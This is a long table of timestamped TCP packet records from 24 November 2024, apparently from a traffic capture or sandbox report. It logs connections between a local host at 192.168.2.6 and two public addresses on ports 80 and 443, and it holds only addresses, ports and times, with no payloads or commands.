                                                                                                                                                                                              Nov 24, 2024 13:39:28.855104923 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.855242014 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.855283976 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.856112957 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.856237888 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.856285095 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.857105970 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.857177973 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.857691050 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.857894897 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.858016014 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.858059883 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.858707905 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.858853102 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.858900070 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.859695911 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.859808922 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.859854937 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.860671043 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.860797882 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.860841990 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.861709118 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.861803055 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.861972094 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.862714052 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.862845898 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.862853050 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.862890005 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.863709927 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.863873005 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.864690065 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.864734888 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.864855051 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.865493059 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.865679026 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.865848064 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.865890026 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.866662979 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.866780043 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.866864920 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.867655993 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.867769003 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.867810965 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.868645906 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.868765116 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.868815899 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.869692087 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.869781971 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.869828939 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.875837088 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.891108990 CET4434975613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.891264915 CET4434975613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.891324997 CET49756443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:28.891535044 CET49756443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:28.891555071 CET4434975613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.891565084 CET49756443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:28.891571045 CET4434975613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.902791977 CET49760443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:28.902851105 CET4434976013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.903206110 CET49760443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:28.903373003 CET49760443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:28.903392076 CET4434976013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.907944918 CET4434975413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.908026934 CET4434975413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.908087015 CET49754443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:28.908257961 CET49754443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:28.908282995 CET4434975413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.908298969 CET49754443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:28.908307076 CET4434975413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.910687923 CET49761443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:28.910727024 CET4434976113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.910789013 CET49761443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:28.910931110 CET49761443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:28.910943031 CET4434976113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.032432079 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.032475948 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.032526970 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.032731056 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.032747030 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.032803059 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.148998976 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.151837111 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.151851892 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.152003050 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.152160883 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.152200937 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.271464109 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.271517038 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.271533966 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.271549940 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.271565914 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.271584034 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.271600008 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.271615982 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.271631956 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.271631002 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.271686077 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.271686077 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.271703959 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.271719933 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.271728039 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.271735907 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.271752119 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.271761894 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.271768093 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.271792889 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.271837950 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.271862984 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.271876097 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.271914959 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.271940947 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.271956921 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.271980047 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.271986008 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.272002935 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.272010088 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.272020102 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.272033930 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.272037029 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.272053003 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.272080898 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.272100925 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.272125959 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.272140980 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.272165060 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.272166014 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.272181988 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.272186041 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.272208929 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.272224903 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.272224903 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.272243023 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.272258043 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.272274971 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.272285938 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.272301912 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.272306919 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.272320032 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.272335052 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.272356987 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.272361040 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.272378922 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.272380114 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.272394896 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.272411108 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.272427082 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.272439003 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.272444010 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.272460938 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.272469997 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.272479057 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.272484064 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.272506952 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.272517920 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.272524118 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.272538900 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.272553921 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.272572041 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.272578001 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.272597075 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.272598028 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.272613049 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.272629023 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.272646904 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.272650957 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.272663116 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.272674084 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.272677898 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.272695065 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.272710085 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.272712946 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.272727013 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.272746086 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.272747993 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.272762060 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.272778034 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.272779942 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.272794008 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.272804976 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.272809982 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.272826910 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.272828102 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.272845030 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.272860050 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.272867918 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.272876024 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.272892952 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.272897959 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.272908926 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.272924900 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.272941113 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.272945881 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.272957087 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.272972107 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.272975922 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.272993088 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.272998095 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.273009062 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.273025990 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.273041010 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.273046970 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.273066998 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.273070097 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.273082972 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.273097992 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.273113012 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.273128986 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.273132086 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.273145914 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.273154974 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.273169994 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.273171902 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.273186922 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.273202896 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.273214102 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.273217916 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.273233891 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.273245096 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.273250103 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.273266077 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.273281097 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.273309946 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.273313999 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.273327112 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.273344040 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.273359060 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.273366928 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.273375988 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.273375988 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.273392916 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.273420095 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.273489952 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.273504972 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.273519993 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.273536921 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.273541927 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.273552895 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.273556948 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.273570061 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.273585081 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.273592949 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.273602009 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.273626089 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.273641109 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.273642063 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.273658037 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.273662090 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.273680925 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.273695946 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.273698092 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.273715019 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.273730993 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.273747921 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.273751974 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.273763895 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.273772001 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.273780107 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.273797035 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.273799896 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.273818016 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.273833990 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.273835897 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.273850918 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.273864985 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.273885965 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.273907900 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.273920059 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.273935080 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.273964882 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.273971081 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.273982048 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.273996115 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.274015903 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.274017096 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.274038076 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.274054050 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.274054050 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.274070024 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.274091005 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.274107933 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.274111032 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.274123907 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.274132967 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.274139881 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.274156094 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.274168968 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.274180889 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.274203062 CET8049752185.215.113.16192.168.2.6
